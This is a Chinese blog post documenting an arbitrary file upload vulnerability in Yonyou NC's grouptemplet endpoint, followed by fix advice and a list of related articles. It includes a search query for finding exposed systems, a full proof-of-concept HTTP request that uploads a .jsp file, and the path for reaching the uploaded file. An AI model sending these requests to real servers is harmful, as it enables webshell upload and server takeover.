用友 NC grouptemplet 文件上传漏洞

最新推荐文章于 2024-07-17 20:53:13 发布
最新推荐文章于 2024-07-17 20:53:13 发布
阅读量552 收藏 1
点赞数 9
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/137797293
版权

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
漏洞介绍
用友 NC grouptemplet接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

资产测绘

title=“YONYOU NC”
在这里插入图片描述

漏洞复现

POC:

POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
Host: your_ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="xxx.jsp"
Content-Type: application/octet-stream

hello Nc
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--

这里的groupid=??为上传路径的一部分,这里写的nc,下面路径就包括nc

上传成功,上传路径为
/uapim/static/pages/nc/head.jsp

GET /uapim/static/pages/nc/head.jsp HTTP/1.1
Host: your_ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

keepb1ue
关注
  • 9
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NC grouptemplet任意文件上传漏洞(含批量验证poc)
weixin_43567873的博客
04-17 173
用友NC grouptemplet任意文件上传漏洞(含批量验证poc)
用友NC Cloud saveImageServlet/doPost接口存在任意文件上传漏洞
wan___she__pi的博客
04-21 572
用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。同时,用友NC Cloud 还支持多终端访问,适应各种不同的设备和工作场景,方便用户灵活办公和协作。
用友NC grouptemplet 存在任意文件上传漏洞
wan___she__pi的博客
04-29 385
用友NC 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。
Web项目中各文件夹的作用
萧无义的武功秘籍
04-17 3157
/WEB-INF安全目录 , 用户不能直接访问该目录下的内容 /WEB-INF/web.xmlWeb应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则 , 优先级要大于服务器中web.xml。 /WEB-INF/classes/包含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中。 /WEB-I...
报表代码_u8安装28672_报表代码制定_uapim_用友U8UAP_UAP开发_
10-04
用友U8UAP开发示例,使用C#语言,适合初学者。
uniapp富文本编辑器上传到Fastadmin,P标签被过滤解决办法
u012365440的博客
07-06 1533
最近用到uniapp和fastadmin开发项目的时候遇到一个比较棘手的问题。 就是uniapp使用富文本编辑器上传图片的时候,明明在编辑器中已经正常上传图片,但是提交完表单,在数据库查看的时候发现仅保存了文字 部分的内容,而图片链接并没有被保存下来。 先上个图: 大家仔细看content字段表的部分,第二行的数据是在后台添加的,第一个数据是uniapp提交添加的。区别很明显,因为p标签被过滤掉了,所以图片链接也没有保存进来。 原因:Thinkphp5的表单上传默认会过滤掉p标签
upload实验
dyx0910的博客
05-18 516
upload实验
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 769
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 477
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1068
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 939
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
2024年对网络安全专业的观点解析
最新发布
goodxianping的专栏
07-17 363
网络安全专业的毕业生能够适应多个行业和岗位,包括但不限于政府部门、金融机构、大型互联网公司、电信运营商、科研机构的安全团队。学历较低、经验不足的大量初级从业人员与企业的需求不匹配,一方面找工作难,一方面企业招聘不到合适的安全人员,导致供需矛盾。在网络安全领域,学历并非衡量一个人能力的唯一标准,但普遍较低的学历水平确实反映了行业人才结构的某些问题。张雪峰对网络安全专业的看法是积极和乐观的。随着信息时代的到来,各类企业和组织对网络安全的需求越来越大,使得该专业的毕业生在市场上拥有很大的需求量。
AI基于大模型语言存在的网络安全风险
yh
07-16 410
AI网络安全
智能车的网络安全隐患及其防护技术
tigerman20201的博客
07-13 424
本文分析了智能车的主要网络安全威胁,包括车辆通信系统、自动驾驶系统、以及车载娱乐系统的潜在风险。在此基础上,提出了多层次的安全防护技术,包括加密通信、入侵检测系统、以及区块链技术等,以提升智能车的网络安全水平。智能车的网络安全是一个复杂且重要的问题,需要多层次、多方面的技术防护。通过加密通信、入侵检测系统、区块链技术等多种手段的结合,可以有效提升智能车的安全性,保障乘客和行人的安全。未来,随着技术的进步和标准的完善,智能车的网络安全将得到进一步的保障。**题目:智能车的网络安全隐患及其防护技术**
7.13实训日志
Kidding_Ma的博客
07-13 504
作为一名大学生,我深感有责任在今后的学习和职业生涯中,为推动网络安全技术的发展和应用做出贡献,保障数字化社会的安全和稳定发展。在技术方面,我们学习了多种编程语言和工具的应用,如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上,专家学者们分享了关于网络安全最新的研究成果和技术应用,以及面临的挑战和未来的发展方向,给我留下了深刻的印象和启发。学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。
网络安全工作者如何解决网络拥堵
gmqqcsdn的博客
07-15 811
网络如同现代社会的血管,承载着信息的血液流动。然而,随着数据流量的激增,网络拥堵已成为不容忽视的问题,它像是一场数字世界的交通堵塞,减缓了信息传递的速度,扰乱了网络空间的秩序。作为网络安全的守护者,网络安全工作者必须运用战略智慧和技术手段,解决这一难题,确保每一位用户都能享受流畅的在线体验。
自学黑客(网络安全
热门推荐
xv7676的博客
07-13 2万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
“萝卜快跑”仍然存在出现多处高危网络安全问题
Sunspot
07-14 1086
目前武汉已经实现全覆盖,由百度推出的无人驾驶技"萝卜快跑"_无人驾驶汽车,便宜又好使用,不超速,不绕路,只要在手机上下单,一键直达目的地缺点:情绪十分稳定,遇到堵车无法通过大数据定位转弯绕路,太死板。
web安全及内网安全知识
无问社区的博客
07-09 1020
web安全和内网安全的知识总结,和文章推荐。这方面网上资料很多,于是小编就整合在了一起方便自己查看阅读
用友nc6.5 文件上传
09-06
用友NC6.5中,文件上传通常是通过以下步骤完成的: 1. 登录用友NC6.5系统,进入相关业务模块或页面。 2. 找到需要上传文件的相关功能或模块按钮,通常会有一个上传文件的图标或链接。 3. 点击上传文件按钮或链接,系统将弹出一个文件选择对话框。 4. 在文件选择对话框中,浏览本地文件系统,找到需要上传的文件,并选择该文件。 5. 确定文件选择后,点击“上传”或“确定”按钮,系统开始将选定的文件上传到服务器。 6. 在文件上传过程中,系统可能会显示上传进度条或文件上传状态。 7. 上传完成后,系统会提示文件上传成功,并显示相关的文件信息,如文件名、大小等。 8. 根据实际需求,可能需要进一步操作或处理上传的文件,如保存文件到数据库、关联文件到相关业务记录等。 请注意,以上步骤只是一般的文件上传流程,在用友NC6.5系统中,具体的文件上传操作可能会因业务模块或页面的不同而有所差异。所以,在具体操作时,最好参考系统提供的相关文档或向系统管理员咨询以获取详细的操作指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值